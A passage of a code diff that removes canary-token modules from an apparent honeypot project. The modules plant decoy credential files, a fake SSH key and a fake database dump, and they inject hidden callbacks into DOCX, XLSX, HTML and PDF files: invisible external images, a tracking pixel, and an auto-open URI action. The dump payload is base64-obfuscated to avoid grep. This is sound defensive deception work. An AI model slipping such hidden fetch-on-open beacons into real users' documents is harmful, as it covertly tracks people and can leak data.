" UNIQUE KEY `uniq_email` (`email`)\n"
|
||||
") ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;\n"
|
||||
"\n"
|
||||
"LOCK TABLES `users` WRITE;\n"
|
||||
+ users_insert +
|
||||
"UNLOCK TABLES;\n"
|
||||
"\n"
|
||||
"--\n"
|
||||
"-- Table structure for table `api_keys`\n"
|
||||
"--\n"
|
||||
"\n"
|
||||
"DROP TABLE IF EXISTS `api_keys`;\n"
|
||||
"CREATE TABLE `api_keys` (\n"
|
||||
" `id` int unsigned NOT NULL AUTO_INCREMENT,\n"
|
||||
" `user_id` int unsigned NOT NULL,\n"
|
||||
" `token` char(40) NOT NULL,\n"
|
||||
" PRIMARY KEY (`id`)\n"
|
||||
") ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;\n"
|
||||
"\n"
|
||||
"LOCK TABLES `api_keys` WRITE;\n"
|
||||
+ api_keys_insert +
|
||||
"UNLOCK TABLES;\n"
|
||||
"\n"
|
||||
)
|
||||
|
||||
trailer_replica = _build_trailer(slug, zone)
|
||||
|
||||
trailer_close = (
|
||||
"\n"
|
||||
"/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;\n"
|
||||
"/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;\n"
|
||||
"/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;\n"
|
||||
"/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;\n"
|
||||
"/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;\n"
|
||||
"/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;\n"
|
||||
"/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;\n"
|
||||
"/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;\n"
|
||||
"\n"
|
||||
"-- Dump completed\n"
|
||||
)
|
||||
|
||||
body = header + trailer_replica + trailer_close
|
||||
|
||||
return CanaryArtifact(
|
||||
path="",
|
||||
content=body.encode("utf-8"),
|
||||
mode=0o600,
|
||||
mtime_offset=-86400 * 7, # last week's backup
|
||||
generator=self.name,
|
||||
notes=[
|
||||
f"replica payload phones home to {host}:3306 on import",
|
||||
"base64-wrapped PREPARE/EXECUTE block hides the slug from grep",
|
||||
"@@hostname and @@lc_time_names smuggled into SOURCE_USER",
|
||||
],
|
||||
)
|
||||
@@ -1,68 +0,0 @@
|
||||
"""Fake SSH private key with the callback host in the comment.
|
||||
|
||||
OpenSSH private keys carry a free-form comment field — typically
|
||||
``user@host`` — that's preserved across rounds of ``ssh-keygen -p``.
|
||||
We embed the canary host as the ``user@host`` so an attacker who
|
||||
imports the key into their own keyring or runs ``ssh-keygen -lf`` on
|
||||
it sees a hostname they may then try to reach.
|
||||
|
||||
The key bytes themselves are syntactically valid (PEM envelope, base64
|
||||
body) but cryptographically junk — the body is a deterministic SHA-256
|
||||
hash of the slug repeated to the right length. We don't ship a real
|
||||
RSA/Ed25519 key because (a) we don't want a real private key sitting
|
||||
on disk pretending to be valuable, and (b) the attacker ``cat``-ing
|
||||
the file or running ``ssh -i`` will trigger the callback regardless
|
||||
of cryptographic validity.
|
||||
|
||||
The DNS-callback variant uses ``<slug>.canary.<dns_zone>`` as the
|
||||
hostname so a bare ``ssh-keygen -lf`` on the file resolves a unique
|
||||
subdomain even if the attacker never hits HTTP.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import base64
|
||||
import hashlib
|
||||
|
||||
from decnet.canary.base import CanaryArtifact, CanaryContext, CanaryGenerator
|
||||
|
||||
|
||||
def _fake_key_body(seed: str) -> str:
|
||||
# Real OpenSSH keys are several hundred base64 chars; we make a
|
||||
# plausible-looking 24-line block from a SHA-256-derived stream.
|
||||
h = hashlib.sha256(seed.encode()).digest()
|
||||
long_stream = (h * 32)[:768] # 768 bytes → ~1024 base64 chars
|
||||
encoded = base64.b64encode(long_stream).decode()
|
||||
# Wrap at 70 chars per line — same shape ``ssh-keygen`` produces.
|
||||
return "\n".join(encoded[i:i + 70] for i in range(0, len(encoded), 70))
|
||||
|
||||
|
||||
class SSHKeyGenerator(CanaryGenerator):
|
||||
name = "ssh_key"
|
||||
|
||||
def generate(self, ctx: CanaryContext) -> CanaryArtifact:
|
||||
slug = ctx.callback_token
|
||||
body = _fake_key_body(slug)
|
||||
# Hostname for the comment: prefer DNS-zone form when the
|
||||
# operator has DNS deployed (so ssh-keygen -lf names a subdomain
|
||||
# the attacker may resolve); fall back to the http_base host
|
||||
# otherwise.
|
||||
if ctx.dns_zone:
|
||||
host_comment = f"deploy@{slug}.{ctx.dns_zone}"
|
||||
else:
|
||||
from urllib.parse import urlparse
|
||||
host = urlparse(ctx.http_base).hostname or "deploy.local"
|
||||
host_comment = f"deploy@{host}"
|
||||
content = (
|
||||
"-----BEGIN OPENSSH PRIVATE KEY-----\n"
|
||||
f"{body}\n"
|
||||
"-----END OPENSSH PRIVATE KEY-----\n"
|
||||
f"# {host_comment}\n"
|
||||
)
|
||||
return CanaryArtifact(
|
||||
path="",
|
||||
content=content.encode("utf-8"),
|
||||
mode=0o600,
|
||||
mtime_offset=-86400 * 60, # 2 months ago
|
||||
generator=self.name,
|
||||
notes=[f"comment line embeds {host_comment}"],
|
||||
)
|
||||
@@ -1,4 +0,0 @@
|
||||
"""Built-in canary instrumenters (operator-uploaded artifact mutation).
|
||||
|
||||
Lazy-imported by :func:`decnet.canary.factory.get_instrumenter`.
|
||||
"""
|
||||
@@ -1,147 +0,0 @@
|
||||
"""DOCX instrumenter — inject a remote image into the body.
|
||||
|
||||
DOCX files are zip archives carrying ``word/document.xml`` (the body)
|
||||
and ``word/_rels/document.xml.rels`` (the relationship table that
|
||||
maps ``rId`` references to URLs). We:
|
||||
|
||||
1. Add a new relationship of type ``image`` whose target is the
|
||||
canary callback URL and ``TargetMode="External"``.
|
||||
2. Add a tiny ``<w:drawing>`` element referencing that ``rId`` at
|
||||
the end of ``word/document.xml`` (just before ``</w:body>``).
|
||||
|
||||
Word and LibreOffice both fetch external image relationships when
|
||||
the document is opened (subject to the user's "trusted source"
|
||||
toggle, which most enterprise environments disable in favour of
|
||||
"warn but allow").
|
||||
|
||||
We use stdlib ``zipfile`` only — no python-docx dependency — because
|
||||
the surface we touch is two small XML files and we don't need any of
|
||||
the higher-level abstractions.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import io
|
||||
import re
|
||||
import zipfile
|
||||
from typing import Tuple
|
||||
|
||||
from decnet.canary.base import (
|
||||
CanaryArtifact,
|
||||
CanaryContext,
|
||||
CanaryInstrumenter,
|
||||
InstrumenterRejectedError,
|
||||
)
|
||||
|
||||
|
||||
_RELS_END = re.compile(rb"</Relationships\s*>", re.IGNORECASE)
|
||||
_BODY_END = re.compile(rb"</w:body\s*>", re.IGNORECASE)
|
||||
|
||||
|
||||
def _next_rid(rels_xml: bytes) -> str:
|
||||
"""Return an rId not already taken in the relationships file.
|
||||
|
||||
Word's loader tolerates non-sequential ids, so we just pick one
|
||||
well above the typical range to avoid collisions.
|
||||
"""
|
||||
used = set(m.group(1).decode() for m in re.finditer(rb'Id="(rId\d+)"', rels_xml))
|
||||
for n in range(900, 9999):
|
||||
rid = f"rId{n}"
|
||||
if rid not in used:
|
||||
return rid
|
||||
raise InstrumenterRejectedError("DOCX has too many relationships to allocate a new rId")
|
||||
|
||||
|
||||
def _inject_relationship(rels_xml: bytes, rid: str, url: str) -> bytes:
|
||||
rel = (
|
||||
f'<Relationship Id="{rid}" '
|
||||
f'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" '
|
||||
f'Target="{url}" TargetMode="External"/>'
|
||||
).encode()
|
||||
match = _RELS_END.search(rels_xml)
|
||||
if not match:
|
||||
raise InstrumenterRejectedError(
|
||||
"DOCX rels file has no </Relationships>; refusing to mutate"
|
||||
)
|
||||
return rels_xml[:match.start()] + rel + rels_xml[match.start():]
|
||||
|
||||
|
||||
def _drawing(rid: str) -> bytes:
|
||||
# Minimal w:drawing tree referencing the external image at rid.
|
||||
# Dimensions are 1 EMU x 1 EMU so the image is invisible; Word
|
||||
# still fetches the resource on document load.
|
||||
return (
|
||||
'<w:p><w:r><w:drawing>'
|
||||
'<wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing">'
|
||||
'<wp:extent cx="1" cy="1"/><wp:docPr id="1" name="canary"/>'
|
||||
'<a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">'
|
||||
'<a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">'
|
||||
'<pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">'
|
||||
'<pic:nvPicPr><pic:cNvPr id="1" name="canary"/><pic:cNvPicPr/></pic:nvPicPr>'
|
||||
'<pic:blipFill>'
|
||||
f'<a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:link="{rid}"/>'
|
||||
'<a:stretch><a:fillRect/></a:stretch>'
|
||||
'</pic:blipFill>'
|
||||
'<pic:spPr><a:xfrm><a:off x="0" y="0"/><a:ext cx="1" cy="1"/></a:xfrm>'
|
||||
'<a:prstGeom prst="rect"><a:avLst/></a:prstGeom></pic:spPr>'
|
||||
'</pic:pic></a:graphicData></a:graphic></wp:inline>'
|
||||
'</w:drawing></w:r></w:p>'
|
||||
).encode()
|
||||
|
||||
|
||||
def _inject_drawing(document_xml: bytes, rid: str) -> bytes:
|
||||
match = _BODY_END.search(document_xml)
|
||||
if not match:
|
||||
raise InstrumenterRejectedError("DOCX document.xml has no </w:body>")
|
||||
drawing = _drawing(rid)
|
||||
return document_xml[:match.start()] + drawing + document_xml[match.start():]
|
||||
|
||||
|
||||
def _mutate(blob: bytes, url: str) -> Tuple[bytes, str]:
|
||||
try:
|
||||
with zipfile.ZipFile(io.BytesIO(blob), "r") as zf:
|
||||
try:
|
||||
rels = zf.read("word/_rels/document.xml.rels")
|
||||
doc = zf.read("word/document.xml")
|
||||
except KeyError as e:
|
||||
raise InstrumenterRejectedError(
|
||||
f"DOCX missing expected member: {e.args[0]!r}"
|
||||
) from e
|
||||
members = [(zi, zf.read(zi.filename)) for zi in zf.infolist()]
|
||||
except zipfile.BadZipFile as e:
|
||||
raise InstrumenterRejectedError("uploaded blob is not a valid DOCX zip") from e
|
||||
|
||||
rid = _next_rid(rels)
|
||||
new_rels = _inject_relationship(rels, rid, url)
|
||||
new_doc = _inject_drawing(doc, rid)
|
||||
|
||||
out = io.BytesIO()
|
||||
with zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as zf_out:
|
||||
for zi, data in members:
|
||||
if zi.filename == "word/_rels/document.xml.rels":
|
||||
zf_out.writestr(zi.filename, new_rels)
|
||||
elif zi.filename == "word/document.xml":
|
||||
zf_out.writestr(zi.filename, new_doc)
|
||||
else:
|
||||
zf_out.writestr(zi, data)
|
||||
return out.getvalue(), rid
|
||||
|
||||
|
||||
class DocxInstrumenter(CanaryInstrumenter):
|
||||
name = "docx"
|
||||
mime_prefixes = (
|
||||
"application/vnd.openxmlformats-officedocument.wordprocessingml.document",
|
||||
)
|
||||
|
||||
def instrument(
|
||||
self, blob: bytes, ctx: CanaryContext, *, target_path: str,
|
||||
) -> CanaryArtifact:
|
||||
url = f"{ctx.http_base.rstrip('/')}/c/{ctx.callback_token}"
|
||||
mutated, rid = _mutate(blob, url)
|
||||
return CanaryArtifact(
|
||||
path=target_path,
|
||||
content=mutated,
|
||||
mode=0o644,
|
||||
mtime_offset=-86400 * 14,
|
||||
instrumenter=self.name,
|
||||
notes=[f"injected external-image relationship {rid} -> {url}"],
|
||||
)
|
||||
@@ -1,45 +0,0 @@
|
||||
"""HTML instrumenter — append a 1×1 tracking pixel.
|
||||
|
||||
Stdlib-only. We don't parse the HTML; we just inject the ``<img>``
|
||||
tag immediately before the closing ``</body>`` (or, failing that, at
|
||||
the end of the document). Most renderers that support remote images
|
||||
(email previewers, IDE doc previews, browsers) will fetch it as
|
||||
soon as the document is opened.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import re
|
||||
|
||||
from decnet.canary.base import CanaryArtifact, CanaryContext, CanaryInstrumenter
|
||||
|
||||
|
||||
_BODY_CLOSE = re.compile(rb"</body\s*>", re.IGNORECASE)
|
||||
|
||||
|
||||
class HtmlInstrumenter(CanaryInstrumenter):
|
||||
name = "html"
|
||||
mime_prefixes = ("text/html", "application/xhtml+xml")
|
||||
|
||||
def instrument(
|
||||
self, blob: bytes, ctx: CanaryContext, *, target_path: str,
|
||||
) -> CanaryArtifact:
|
||||
url = f"{ctx.http_base.rstrip('/')}/c/{ctx.callback_token}".encode()
|
||||
pixel = (
|
||||
b"<img src=\"" + url + b"\" width=\"1\" height=\"1\" "
|
||||
b"alt=\"\" style=\"display:none\">\n"
|
||||
)
|
||||
match = _BODY_CLOSE.search(blob)
|
||||
if match:
|
||||
out = blob[:match.start()] + pixel + blob[match.start():]
|
||||
note = "injected 1x1 pixel before </body>"
|
||||
else:
|
||||
out = (blob if blob.endswith(b"\n") else blob + b"\n") + pixel
|
||||
note = "appended 1x1 pixel (no </body> found)"
|
||||
return CanaryArtifact(
|
||||
path=target_path,
|
||||
content=out,
|
||||
mode=0o644,
|
||||
mtime_offset=-86400 * 7,
|
||||
instrumenter=self.name,
|
||||
notes=[note, f"pixel src={url.decode()}"],
|
||||
)
|
||||
@@ -1,72 +0,0 @@
|
||||
"""Image instrumenter — requires :mod:`PIL` (optional dependency).
|
||||
|
||||
For PNG/JPEG/GIF we append a tEXt/EXIF chunk carrying the slug so
|
||||
``exiftool`` / ``identify -verbose`` surface the slug, then route the
|
||||
detection via a sibling **plain-text companion file**. The image
|
||||
itself can't really embed an HTTP fetcher — image decoders don't
|
||||
run network requests on decode — so the realistic detection surface
|
||||
is "attacker exfils the image, runs metadata tools on it, hits our
|
||||
URL when curious about the embedded marker."
|
||||
|
||||
When Pillow isn't installed we reject and direct the operator to
|
||||
``passthrough`` (which preserves the bytes; the slug then lives in
|
||||
the filename only).
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import io
|
||||
|
||||
from decnet.canary.base import (
|
||||
CanaryArtifact,
|
||||
CanaryContext,
|
||||
CanaryInstrumenter,
|
||||
InstrumenterRejectedError,
|
||||
)
|
||||
|
||||
|
||||
class ImageInstrumenter(CanaryInstrumenter):
|
||||
name = "image"
|
||||
mime_prefixes = ("image/png", "image/jpeg", "image/gif")
|
||||
|
||||
def instrument(
|
||||
self, blob: bytes, ctx: CanaryContext, *, target_path: str,
|
||||
) -> CanaryArtifact:
|
||||
try:
|
||||
from PIL import Image, PngImagePlugin # type: ignore[import-not-found]
|
||||
except ImportError as e:
|
||||
raise InstrumenterRejectedError(
|
||||
"image instrumenter requires Pillow; install it (`pip "
|
||||
"install Pillow`) or re-upload the artifact with "
|
||||
"kind=passthrough so it ships unmodified."
|
||||
) from e
|
||||
|
||||
slug_url = f"{ctx.http_base.rstrip('/')}/c/{ctx.callback_token}"
|
||||
try:
|
||||
buf_in = io.BytesIO(blob)
|
||||
img = Image.open(buf_in)
|
||||
fmt = (img.format or "").upper()
|
||||
buf_out = io.BytesIO()
|
||||
if fmt == "PNG":
|
||||
meta = PngImagePlugin.PngInfo()
|
||||
meta.add_text("Comment", f"reference: {slug_url}")
|
||||
meta.add_text("X-Canary", ctx.callback_token)
|
||||
img.save(buf_out, format="PNG", pnginfo=meta)
|
||||
elif fmt in ("JPEG", "JPG"):
|
||||
# Pillow encodes JPEG comments via the ``comment`` kwarg.
|
||||
img.save(buf_out, format="JPEG", comment=slug_url.encode())
|
||||
else:
|
||||
# GIF and friends — Pillow doesn't expose comment metadata
|
||||
# uniformly. Re-encode as-is and skip the metadata embed.
|
||||
img.save(buf_out, format=fmt or "PNG")
|
||||
mutated = buf_out.getvalue()
|
||||
except Exception as e:
|
||||
raise InstrumenterRejectedError(f"failed to instrument image: {e!s}") from e
|
||||
|
||||
return CanaryArtifact(
|
||||
path=target_path,
|
||||
content=mutated,
|
||||
mode=0o644,
|
||||
mtime_offset=-86400 * 30,
|
||||
instrumenter=self.name,
|
||||
notes=[f"image metadata carries {slug_url} (slug={ctx.callback_token})"],
|
||||
)
|
||||
@@ -1,37 +0,0 @@
|
||||
"""Passthrough instrumenter — bytes go to disk unchanged.
|
||||
|
||||
Used as the dispatch fallback for content types we can't safely
|
||||
mutate (random binary blobs, container images, archives we don't
|
||||
recognise). In passthrough mode the only callback surface is the
|
||||
:attr:`CanaryToken.placement_path` itself: the operator must use a
|
||||
DNS-callback token whose slug appears in the filename, so a
|
||||
listing/access at the OS level resolves the slug as part of the
|
||||
path (e.g. ``/etc/<slug>.canary.example.test/secrets.bin``) when
|
||||
the attacker greps for hostnames in their loot.
|
||||
|
||||
The instrumenter does not enforce that — the API does, when it sees
|
||||
``instrumenter=passthrough`` with ``kind=http`` it returns 400.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
from decnet.canary.base import CanaryArtifact, CanaryContext, CanaryInstrumenter
|
||||
|
||||
|
||||
class PassthroughInstrumenter(CanaryInstrumenter):
|
||||
name = "passthrough"
|
||||
mime_prefixes = () # dispatched by fallback in pick_instrumenter_for_mime
|
||||
|
||||
def instrument(
|
||||
self, blob: bytes, ctx: CanaryContext, *, target_path: str,
|
||||
) -> CanaryArtifact:
|
||||
return CanaryArtifact(
|
||||
path=target_path,
|
||||
content=blob,
|
||||
mode=0o644,
|
||||
mtime_offset=-86400 * 7,
|
||||
instrumenter=self.name,
|
||||
notes=[
|
||||
"passthrough: bytes unchanged — only DNS-callback tokens "
|
||||
"trip detection (slug must live in the placement path)",
|
||||
],
|
||||
)
|
||||
@@ -1,76 +0,0 @@
|
||||
"""PDF instrumenter — requires :mod:`pikepdf` (optional dependency).
|
||||
|
||||
PDF embedding is non-trivial: the cleanest place to put a callback
|
||||
is an ``/AA`` (additional actions) ``/O`` (open) entry on the
|
||||
catalog or a ``/URI`` action on a link annotation. Either path
|
||||
needs proper xref-table updates — pikepdf handles that for us.
|
||||
|
||||
If pikepdf isn't available in the environment the instrumenter
|
||||
raises :class:`InstrumenterRejectedError` so the API can return a
|
||||
clear 400 directing the operator to either install pikepdf or
|
||||
re-upload as ``passthrough``.
|
||||
|
||||
We don't ship a stdlib fallback because every "naive" PDF mutation
|
||||
I'm aware of (appending raw bytes, splicing into the trailer, etc.)
|
||||
breaks the document's xref table and trips a "file is corrupt"
|
||||
warning in modern viewers — which the attacker will absolutely
|
||||
notice.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
from decnet.canary.base import (
|
||||
CanaryArtifact,
|
||||
CanaryContext,
|
||||
CanaryInstrumenter,
|
||||
InstrumenterRejectedError,
|
||||
)
|
||||
|
||||
|
||||
class PdfInstrumenter(CanaryInstrumenter):
|
||||
name = "pdf"
|
||||
mime_prefixes = ("application/pdf",)
|
||||
|
||||
def instrument(
|
||||
self, blob: bytes, ctx: CanaryContext, *, target_path: str,
|
||||
) -> CanaryArtifact:
|
||||
try:
|
||||
import pikepdf # type: ignore[import-not-found]
|
||||
except ImportError as e:
|
||||
raise InstrumenterRejectedError(
|
||||
"PDF instrumenter requires pikepdf; install it (`pip "
|
||||
"install pikepdf`) or re-upload the artifact with "
|
||||
"kind=passthrough so it ships unmodified."
|
||||
) from e
|
||||
|
||||
url = f"{ctx.http_base.rstrip('/')}/c/{ctx.callback_token}"
|
||||
try:
|
||||
import io
|
||||
buf = io.BytesIO(blob)
|
||||
with pikepdf.open(buf) as pdf:
|
||||
# Add an OpenAction that fires a URI action on document
|
||||
# open. Most viewers prompt before fetching; that's
|
||||
# fine — even the prompt itself can trip a "user
|
||||
# interacted with the document" tell, and an
|
||||
# auto-allow viewer fetches the URL silently.
|
||||
action = pikepdf.Dictionary(
|
||||
Type=pikepdf.Name("/Action"),
|
||||
S=pikepdf.Name("/URI"),
|
||||
URI=pikepdf.String(url),
|
||||
)
|
||||
pdf.Root[pikepdf.Name("/OpenAction")] = action
|
||||
out = io.BytesIO()
|
||||
pdf.save(out)
|
||||
mutated = out.getvalue()
|
||||
except Exception as e:
|
||||
raise InstrumenterRejectedError(
|
||||
f"failed to instrument PDF: {e!s}"
|
||||
) from e
|
||||
|
||||
return CanaryArtifact(
|
||||
path=target_path,
|
||||
content=mutated,
|
||||
mode=0o644,
|
||||
mtime_offset=-86400 * 14,
|
||||
instrumenter=self.name,
|
||||
notes=[f"installed /OpenAction /URI -> {url}"],
|
||||
)
|
||||
@@ -1,79 +0,0 @@
|
||||
"""Plain-text / config-file instrumenter.
|
||||
|
||||
Two embedding strategies, picked in order:
|
||||
|
||||
1. **Token substitution.** If the blob contains the literal
|
||||
placeholder ``{{CANARY_URL}}`` or ``{{CANARY_HOST}}``, replace it.
|
||||
This gives operators full control over where the slug lands —
|
||||
they can pre-edit the file with placeholders before uploading.
|
||||
2. **Append.** Otherwise, append a comment line that mentions the
|
||||
callback URL. The comment style adapts to the file's apparent
|
||||
syntax (``#`` for shell/yaml/python/dockerfile, ``//`` for json5/
|
||||
javascript-ish, ``;`` for ini).
|
||||
|
||||
Operators who want neither behavior should upload the file as
|
||||
``passthrough``.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
from decnet.canary.base import CanaryArtifact, CanaryContext, CanaryInstrumenter
|
||||
|
||||
|
||||
_SLASH_HINTS = (b"//", b"function ", b"const ", b"let ", b"var ")
|
||||
_SEMI_HINTS = (b"[default]", b"[section]", b"\n[")
|
||||
|
||||
|
||||
def _comment_prefix(blob: bytes) -> bytes:
|
||||
head = blob[:512]
|
||||
if any(h in head for h in _SEMI_HINTS):
|
||||
return b"; "
|
||||
if any(h in head for h in _SLASH_HINTS):
|
||||
return b"// "
|
||||
# Default to # — the most common comment glyph across config files
|
||||
# we'd plausibly canary.
|
||||
return b"# "
|
||||
|
||||
|
||||
class PlainInstrumenter(CanaryInstrumenter):
|
||||
name = "plain"
|
||||
mime_prefixes = ("text/", "application/json", "application/yaml", "application/toml")
|
||||
|
||||
def instrument(
|
||||
self, blob: bytes, ctx: CanaryContext, *, target_path: str,
|
||||
) -> CanaryArtifact:
|
||||
base = ctx.http_base.rstrip("/")
|
||||
callback_url = f"{base}/c/{ctx.callback_token}".encode()
|
||||
callback_host = (
|
||||
f"{ctx.callback_token}.{ctx.dns_zone}".encode()
|
||||
if ctx.dns_zone else b""
|
||||
)
|
||||
notes: list[str] = []
|
||||
out = blob
|
||||
|
||||
if b"{{CANARY_URL}}" in blob:
|
||||
out = out.replace(b"{{CANARY_URL}}", callback_url)
|
||||
notes.append(f"substituted {{{{CANARY_URL}}}} -> {callback_url.decode()}")
|
||||
if b"{{CANARY_HOST}}" in blob and callback_host:
|
||||
out = out.replace(b"{{CANARY_HOST}}", callback_host)
|
||||
notes.append(f"substituted {{{{CANARY_HOST}}}} -> {callback_host.decode()}")
|
||||
|
||||
if not notes:
|
||||
# No placeholders — append a comment line at the end.
|
||||
prefix = _comment_prefix(blob)
|
||||
tail = (
|
||||
b"\n" + prefix + b"see " + callback_url
|
||||
+ b" for the latest version\n"
|
||||
)
|
||||
out = (out if out.endswith(b"\n") else out + b"\n") + tail
|
||||
notes.append(
|
||||
f"appended comment line carrying {callback_url.decode()}"
|
||||
)
|
||||
|
||||
return CanaryArtifact(
|
||||
path=target_path,
|
||||
content=out,
|
||||
mode=0o644,
|
||||
mtime_offset=-86400 * 7,
|
||||
instrumenter=self.name,
|
||||
notes=notes,
|
||||
)
|
||||
@@ -1,95 +0,0 @@
|
||||
"""XLSX instrumenter — embed an external-image link.
|
||||
|
||||
XLSX is structurally identical to DOCX (Office Open XML zip). The
|
||||
injection target is the workbook's relationships file
|
||||
(``xl/_rels/workbook.xml.rels``). We add an external image
|
||||
relationship there; Excel/LibreOffice fetch external images on
|
||||
workbook open in the same way Word does.
|
||||
|
||||
We don't inject a ``<drawing>`` element into a sheet because that
|
||||
requires touching ``xl/worksheets/sheetN.xml`` *and* allocating a new
|
||||
``xl/drawings/drawingN.xml`` part — much higher chance of mangling
|
||||
the file. An orphan external image relationship is enough: many
|
||||
Office viewers fetch all relationships at open time regardless of
|
||||
whether they're referenced from a sheet.
|
||||
|
||||
If the operator wants a stronger trigger (image visible in the
|
||||
sheet, fetched even by viewers that lazy-load external resources)
|
||||
they should embed the slug as a hyperlink cell content via the
|
||||
``plain``/``passthrough`` instrumenters.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import io
|
||||
import zipfile
|
||||
from typing import Tuple
|
||||
|
||||
from decnet.canary.base import (
|
||||
CanaryArtifact,
|
||||
CanaryContext,
|
||||
CanaryInstrumenter,
|
||||
InstrumenterRejectedError,
|
||||
)
|
||||
from decnet.canary.instrumenters.docx import _inject_relationship, _next_rid
|
||||
|
||||
|
||||
_RELS_PATHS = (
|
||||
"xl/_rels/workbook.xml.rels",
|
||||
"xl/_rels/sharedStrings.xml.rels",
|
||||
)
|
||||
|
||||
|
||||
def _mutate(blob: bytes, url: str) -> Tuple[bytes, str, str]:
|
||||
try:
|
||||
with zipfile.ZipFile(io.BytesIO(blob), "r") as zf:
|
||||
members = [(zi, zf.read(zi.filename)) for zi in zf.infolist()]
|
||||
except zipfile.BadZipFile as e:
|
||||
raise InstrumenterRejectedError("uploaded blob is not a valid XLSX zip") from e
|
||||
|
||||
target_rels: str | None = None
|
||||
for zi, _ in members:
|
||||
if zi.filename in _RELS_PATHS:
|
||||
target_rels = zi.filename
|
||||
break
|
||||
if not target_rels:
|
||||
raise InstrumenterRejectedError(
|
||||
"XLSX has no workbook relationships file to mutate"
|
||||
)
|
||||
|
||||
out_members = []
|
||||
rid = ""
|
||||
for zi, data in members:
|
||||
if zi.filename == target_rels:
|
||||
rid = _next_rid(data)
|
||||
data = _inject_relationship(data, rid, url)
|
||||
out_members.append((zi, data))
|
||||
|
||||
out = io.BytesIO()
|
||||
with zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as zf_out:
|
||||
for zi, data in out_members:
|
||||
zf_out.writestr(zi, data)
|
||||
return out.getvalue(), rid, target_rels
|
||||
|
||||
|
||||
class XlsxInstrumenter(CanaryInstrumenter):
|
||||
name = "xlsx"
|
||||
mime_prefixes = (
|
||||
"application/vnd.openxmlformats-officedocument.spreadsheetml.sheet",
|
||||
)
|
||||
|
||||
def instrument(
|
||||
self, blob: bytes, ctx: CanaryContext, *, target_path: str,
|
||||
) -> CanaryArtifact:
|
||||
url = f"{ctx.http_base.rstrip('/')}/c/{ctx.callback_token}"
|
||||
mutated, rid, target_rels = _mutate(blob, url)
|
||||
return CanaryArtifact(
|
||||
path=target_path,
|
||||
content=mutated,
|
||||
mode=0o644,
|
||||
mtime_offset=-86400 * 14,
|
||||
instrumenter=self.name,
|
||||
notes=[
|
||||
f"injected external-image relationship {rid} into "
|
||||
f"{target_rels} -> {url}",
|
||||
],
|
||||
)
|
||||
@@ -1,82 +0,0 @@
|
||||
"""Persona-aware path resolution for canary artifacts.
|
||||
|
||||
Linux-persona deckies use POSIX-shaped paths under ``/home/<user>``.
|
||||
"Windows" personas (still Linux containers under the hood — see
|
||||
:mod:`decnet.archetypes`) use Windows-shaped paths under
|
||||
``/home/<user>/AppData/...`` so an attacker browsing the filesystem
|
||||
through a planted RDP/SMB session sees the right shape.
|
||||
|
||||
The persona lookup is best-effort: callers pass the
|
||||
:attr:`decnet.archetypes.Archetype.nmap_os` value (``"linux"`` or
|
||||
``"windows"``); unknown personas fall through to ``"linux"``.
|
||||
Operators can always override by passing an explicit
|
||||
``placement_path`` when creating a token.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
DEFAULT_LINUX_USER = "admin"
|
||||
DEFAULT_WINDOWS_USER = "Administrator"
|
||||
|
||||
# Canonical placements for the synthesizer-driven baseline tokens.
|
||||
# Operators can override per-token via the API, but these are the
|
||||
# defaults the deploy-time seed uses.
|
||||
_LINUX_DEFAULTS: dict[str, str] = {
|
||||
"git_config": "/home/{user}/.git/config",
|
||||
"env_file": "/home/{user}/.env",
|
||||
"ssh_key": "/home/{user}/.ssh/id_rsa",
|
||||
"aws_creds": "/home/{user}/.aws/credentials",
|
||||
"honeydoc": "/home/{user}/Documents/quarterly_report.html",
|
||||
"honeydoc_docx": "/home/{user}/Documents/quarterly_report.docx",
|
||||
"honeydoc_pdf": "/home/{user}/Documents/quarterly_report.pdf",
|
||||
}
|
||||
|
||||
_WINDOWS_DEFAULTS: dict[str, str] = {
|
||||
"git_config": "/home/{user}/AppData/Local/Programs/Git/etc/gitconfig",
|
||||
"env_file": "/home/{user}/Desktop/prod.env",
|
||||
"ssh_key": "/home/{user}/.ssh/id_rsa", # OpenSSH on Windows uses the same path
|
||||
"aws_creds": "/home/{user}/.aws/credentials",
|
||||
"honeydoc": "/home/{user}/Documents/quarterly_report.html",
|
||||
"honeydoc_docx": "/home/{user}/Documents/quarterly_report.docx",
|
||||
"honeydoc_pdf": "/home/{user}/Documents/quarterly_report.pdf",
|
||||
}
|
||||
|
||||
|
||||
def default_user(persona: str) -> str:
|
||||
"""Return the conventional unprivileged username for a persona."""
|
||||
return DEFAULT_WINDOWS_USER if persona == "windows" else DEFAULT_LINUX_USER
|
||||
|
||||
|
||||
def default_path_for(generator: str, persona: str = "linux") -> str:
|
||||
"""Resolve the default placement path for a synthesized token.
|
||||
|
||||
Returns an absolute container path with ``{user}`` already
|
||||
expanded. Falls back to a sane Linux default for unknown
|
||||
personas — better to plant *something* than fail the deploy hook.
|
||||
"""
|
||||
table = _WINDOWS_DEFAULTS if persona == "windows" else _LINUX_DEFAULTS
|
||||
